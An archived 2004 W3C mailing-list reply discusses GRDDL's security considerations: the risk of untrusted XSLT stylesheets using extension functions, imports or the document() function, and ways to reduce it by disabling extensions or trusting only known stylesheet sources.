Re: GRDDL from Dominique Hazaël-Massieux on 2004-05-03 (public-rdf-in-xhtml-tf@w3.org from May 2004)

From: Dominique Hazaël-Massieux <dom@w3.org>
Date: Mon, 03 May 2004 10:20:53 +0200
To: bry@itnisk.com
Cc: public-rdf-in-xhtml-tf@w3.org
Message-Id: <1083572453.1292.4854.camel@stratustier>

Le ven 30/04/2004 à 11:58, bry@itnisk.com a écrit :
> In the GRDDL note it states under Security 
> Considerations it states: "
> [...]
> Given the expressive power of XSLT, and the 
> possibility to access external resources 
> from a XSLT style sheet (e.g. through the 
> document function or the xsl:import 
> mechanism), implementors should take the 
> appropriate measures to prevent malicious 
> usage of this mechanism."
> 
> This seems to ignore the most dangerous 
> aspect of the technique outline, that is to 
> say an xsl-t that uses extension functions 
> that then calls objects on the server. 

Why does it seem so? Part of the big expressive power of XSLT relies on
its extensions, indeed.

> I'm not exactly sure anyhow what appropriate 
> security measures the implementor should 
> take, is it being suggested that all 
> stylesheets used in this manner should be 
> processed through first to make sure that 
> there are no xsl:imports, xsl:includes, uses 
> of the document function, extension 
> functions, and so forth?

Well, it depends on the XSLT library you use ; most of them have a way
to disable extensions, to reduce the scope of the document() function,
etc. Alternatively, you can choose to move the trust consideration one
layer up, and only accept XSLTs with well-known URIs and implemented as
static transformations, or only accept XSLTs from domain that you trust,
etc.
(part of this trust mechanism could be indeed to check that the provided
XSLT doesn't infringe the rules set in the GRDDL spec)

>  Given that the 
> model for xsl-t usage is a black box this 
> seems to be a difficult to manage process. 

I hope not so ; the GRDDL demonstrator while not proved 100% safe, is
running on-line, accepting XSLT from everywhere:
http://www.w3.org/2004/01/rdxh/grddl-xml-demo

The underlying XSLT processor has been made safer by refusing
extensions, restricting the scope of access for the document() function,
etc.

Dom
-- 
Dominique Hazaël-Massieux - http://www.w3.org/People/Dom/
W3C/ERCIM
mailto:dom@w3.org

Received on Monday, 3 May 2004 04:22:13 UTC